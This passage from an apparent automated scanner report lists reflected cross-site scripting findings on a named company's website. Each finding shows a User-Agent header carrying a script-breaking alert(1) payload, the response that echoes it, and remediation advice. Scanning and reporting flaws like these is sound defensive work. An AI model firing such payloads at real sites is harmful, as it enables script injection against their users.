User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)d2370</script><script>alert(1)</script>1fabb20e843
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "e3c0ffa39d75e7210afebf4ecd9f361d"
Last-Modified: Wed, 17 Nov 2010 00:54:02 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:54:02 GMT
Content-Length: 26715
Connection: close
Set-Cookie: BERT=VRID%3d60f8bbd1-9c76-448d-93af-3cc687506520|VTID%3d3b9e7c43-8877-4ac5-925d-38a89c7cd894|SX%3d1289956442|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:57:46 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:54:02 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html lang="en">

<head>
<script language="JavaScript" type="text/javascript">
var regC = /https?:\/\/.*?\/\
...[SNIP]...

swfobject.embedSWF("medium_business_splash_preloader.swf?SetLang=en", "flash2", "1000", "375", "6", "",flashvars,flashparams,{},function(e){
var ua="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)d2370</script><script>alert(1)</script>1fabb20e843";
var q="<q>
...[SNIP]...

1.1165. http://www.verizonbusiness.com/ar/ [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /ar/

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad3c5</script><script>alert(1)</script>9c5c78374da was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ar/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)ad3c5</script><script>alert(1)</script>9c5c78374da
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "63d0190eb8cbccb4035132e091029a68"
Last-Modified: Wed, 17 Nov 2010 00:55:40 GMT
Content-Type: text/html; charset=UTF-8
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:55:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3d3b89e2c2-08e1-4b92-b047-287f610fa8a4|VTID%3d52438f59-e9a7-431f-a54c-7b5d946c36ee|SX%3d1289956539|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:59:23 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:55:40 GMT
Content-Length: 53855

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html lang="es">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\
...[SNIP]...
bject.embedSWF("/homepage/vzb_homepage_2010_preloader.swf?SetLang=es", "flash2", "1000", "500", "6", "",flashvars,flashparams,{},function(e){
var ua="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)ad3c5</script><script>alert(1)</script>9c5c78374da";
var q="<q>
...[SNIP]...

1.1166. http://www.verizonbusiness.com/at/ [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /at/

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 691a8</script><script>alert(1)</script>3da1fca7b09 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /at/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)691a8</script><script>alert(1)</script>3da1fca7b09
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "1651302070d72ba338a3a74900d4d54e"
Last-Modified: Wed, 17 Nov 2010 00:56:02 GMT
Content-Type: text/html; charset=UTF-8
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:56:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3dc76e16cf-1a65-4af2-afc7-d296e93af038|VTID%3d1e974eac-5608-4ffd-9b2f-9ba57c49db45|SX%3d1289956561|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:59:45 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:56:02 GMT
Content-Length: 53267

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html lang="de">

<head>
<script language="JavaScript" type="text/javascript">
var regC = /https?:\/\/.*?\/\
...[SNIP]...
bject.embedSWF("/homepage/vzb_homepage_2010_preloader.swf?SetLang=de", "flash2", "1000", "500", "6", "",flashvars,flashparams,{},function(e){
var ua="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)691a8</script><script>alert(1)</script>3da1fca7b09";
var q="<q>
...[SNIP]...

1.1167. http://www.verizonbusiness.com/cl/ [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /cl/

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8075d</script><script>alert(1)</script>187bfcab8ff was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cl/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)8075d</script><script>alert(1)</script>187bfcab8ff
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "1f781d2b402ca3aab8ae47d7a984a659"
Last-Modified: Wed, 17 Nov 2010 00:56:25 GMT
Content-Type: text/html; charset=UTF-8
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:56:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3dafadd073-3fe7-4efe-8109-1cf4aaa32b73|VTID%3d631365ec-560d-4ed0-a7d7-0fb05fe1f87f|SX%3d1289956583|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 06:00:07 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:56:25 GMT
Content-Length: 53837

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html lang="es">

<head>
<script language="JavaScript" type="text/javascript">
var regC = /https?:\/\/.*?\/\
...[SNIP]...
bject.embedSWF("/homepage/vzb_homepage_2010_preloader.swf?SetLang=es", "flash2", "1000", "500", "6", "",flashvars,flashparams,{},function(e){
var ua="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)8075d</script><script>alert(1)</script>187bfcab8ff";
var q="<q>
...[SNIP]...

1.1168. http://www.verizonbusiness.com/co/ [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /co/

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21233</script><script>alert(1)</script>3ad75d0114d was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /co/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)21233</script><script>alert(1)</script>3ad75d0114d
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "699c2fd4bf6f94c670d457392dfa155b"
Last-Modified: Wed, 17 Nov 2010 00:56:13 GMT
Content-Type: text/html; charset=UTF-8
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:56:14 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3deadee65d-048d-456d-9fd4-69abcbbcdce8|VTID%3dcd7c26ae-bc6c-4c1a-92ca-b410eaf8965e|SX%3d1289956572|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:59:56 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:56:13 GMT
Content-Length: 53908

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html lang="es">

<head>
<script language="JavaScript" type="text/javascript">
var regC = /https?:\/\/.*?\/\
...[SNIP]...
bject.embedSWF("/homepage/vzb_homepage_2010_preloader.swf?SetLang=es", "flash2", "1000", "500", "6", "",flashvars,flashparams,{},function(e){
var ua="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)21233</script><script>alert(1)</script>3ad75d0114d";
var q="<q>
...[SNIP]...

1.1169. http://www.verizonbusiness.com/de/ [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /de/

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af933</script><script>alert(1)</script>09cd83e5f31 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /de/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)af933</script><script>alert(1)</script>09cd83e5f31
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "8ff2da68f082767c8658e3842ec772c9"
Last-Modified: Wed, 17 Nov 2010 00:56:42 GMT
Content-Type: text/html; charset=UTF-8
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:56:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3dae5d3222-e39b-4462-a8da-fe0770b9db10|VTID%3dc5881ae4-ca23-4bcf-b70d-2783cd80dc2a|SX%3d1289956600|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 06:00:24 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:56:42 GMT
Content-Length: 53358

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html lang="de">

<head>
<script language="JavaScript" type="text/javascript">
var regC = /https?:\/\/.*?\/\
...[SNIP]...
bject.embedSWF("/homepage/vzb_homepage_2010_preloader.swf?SetLang=de", "flash2", "1000", "500", "6", "",flashvars,flashparams,{},function(e){
var ua="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)af933</script><script>alert(1)</script>09cd83e5f31";
var q="<q>
...[SNIP]...

1.1170. http://www.verizonbusiness.com/es/ [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /es/

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f97ff</script><script>alert(1)</script>18bb90f6273 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /es/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)f97ff</script><script>alert(1)</script>18bb90f6273
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "f07977496701d7b772526dcaebb5ae4c"
Last-Modified: Wed, 17 Nov 2010 01:00:16 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 53745
Date: Wed, 17 Nov 2010 01:00:16 GMT
Connection: close
Set-Cookie: BERT=VRID%3d284395bf-ddc7-4701-b04e-127768b337cc|VTID%3d83e35922-2aff-41e5-b3d0-2c999be94de1|SX%3d1289956814|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 06:03:58 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 19:00:16 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html lang="es">

<head>
<script language="JavaScript" type="text/javascript">
var regC = /https?:\/\/.*?\/\
...[SNIP]...
bject.embedSWF("/homepage/vzb_homepage_2010_preloader.swf?SetLang=es", "flash2", "1000", "500", "6", "",flashvars,flashparams,{},function(e){
var ua="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)f97ff</script><script>alert(1)</script>18bb90f6273";
var q="<q>
...[SNIP]...

1.1171. http://www.verizonbusiness.com/fr/ [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /fr/

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 965f8</script><script>alert(1)</script>ad6aee0e267 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /fr/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)965f8</script><script>alert(1)</script>ad6aee0e267
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 17 Nov 2010 00:56:45 GMT
Server: Roxen/4.5.146-release3
ETag: "b63b5b5107eb1a6adcbd112636ca198c"
Content-Type: text/html; charset=UTF-8
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:56:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3d2cbc3180-3962-46ad-9332-a0ecb8a8e58d|VTID%3d537ed1c6-5bd6-41ed-8e99-e9705296915c|SX%3d1289956603|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 06:00:27 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:56:45 GMT
Content-Length: 54488

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html lang="fr">

<head>
<script language="JavaScript" type="text/javascript">
var regC = /https?:\/\/.*?\/\
...[SNIP]...
bject.embedSWF("/homepage/vzb_homepage_2010_preloader.swf?SetLang=fr", "flash2", "1000", "500", "6", "",flashvars,flashparams,{},function(e){
var ua="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)965f8</script><script>alert(1)</script>ad6aee0e267";
var q="<q>
...[SNIP]...

1.1172. http://www.verizonbusiness.com/jp/ [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /jp/

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47080</script><script>alert(1)</script>35576418f3 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jp/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)47080</script><script>alert(1)</script>35576418f3
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "ba0c86042cd7a844b88ddf36b0447e6d"
Last-Modified: Wed, 17 Nov 2010 00:58:08 GMT
Content-Type: text/html; charset=UTF-8
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:58:08 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3d7a2e46f6-70c5-409b-a12e-bc5a4644ca55|VTID%3d9d2b6e4a-9392-4561-be29-c6931818f6bb|SX%3d1289956687|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 06:01:51 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:58:08 GMT
Content-Length: 50562

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html lang="ja">

<head>
<script language="JavaScript" type="text/javascript">
var regC = /https?:\/\/.*?\/\
...[SNIP]...
bject.embedSWF("/homepage/vzb_homepage_2010_preloader.swf?SetLang=ja", "flash2", "1000", "500", "6", "",flashvars,flashparams,{},function(e){
var ua="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)47080</script><script>alert(1)</script>35576418f3";
var q="<q>
...[SNIP]...

1.1173. http://www.verizonbusiness.com/mx/ [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /mx/

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30181</script><script>alert(1)</script>ef5037903bb was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mx/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)30181</script><script>alert(1)</script>ef5037903bb
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "a9ca4d51d2e037641c51fca6e07e34d7"
Last-Modified: Wed, 17 Nov 2010 00:58:27 GMT
Content-Type: text/html; charset=UTF-8
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:58:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3d2596e80a-9190-43ea-9a9d-18ef89faf0e3|VTID%3ddbafa122-747e-4a08-aa47-63f27558f13c|SX%3d1289956706|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 06:02:10 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:58:27 GMT
Content-Length: 53844

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html lang="es">

<head>
<script language="JavaScript" type="text/javascript">
var regC = /https?:\/\/.*?\/\
...[SNIP]...
bject.embedSWF("/homepage/vzb_homepage_2010_preloader.swf?SetLang=es", "flash2", "1000", "500", "6", "",flashvars,flashparams,{},function(e){
var ua="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)30181</script><script>alert(1)</script>ef5037903bb";
var q="<q>
...[SNIP]...

1.1174. http://www.verizonbusiness.com/pa/ [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /pa/

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b0de</script><script>alert(1)</script>361701e836 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pa/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)6b0de</script><script>alert(1)</script>361701e836
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "20dd1b545f384d5d8bb9e4410273ebfc"
Last-Modified: Wed, 17 Nov 2010 00:58:39 GMT
Content-Type: text/html; charset=UTF-8
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:58:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3d7df98491-7653-4215-8e58-1a6e20fbc3c1|VTID%3dd5898676-8185-478c-a931-916c7f891d6d|SX%3d1289956718|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 06:02:22 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:58:39 GMT
Content-Length: 53841

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html lang="es">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\
...[SNIP]...
bject.embedSWF("/homepage/vzb_homepage_2010_preloader.swf?SetLang=es", "flash2", "1000", "500", "6", "",flashvars,flashparams,{},function(e){
var ua="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)6b0de</script><script>alert(1)</script>361701e836";
var q="<q>
...[SNIP]...

1.1175. http://www.verizonbusiness.com/ve/ [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /ve/

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload de606</script><script>alert(1)</script>8db5382a073 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ve/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)de606</script><script>alert(1)</script>8db5382a073
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
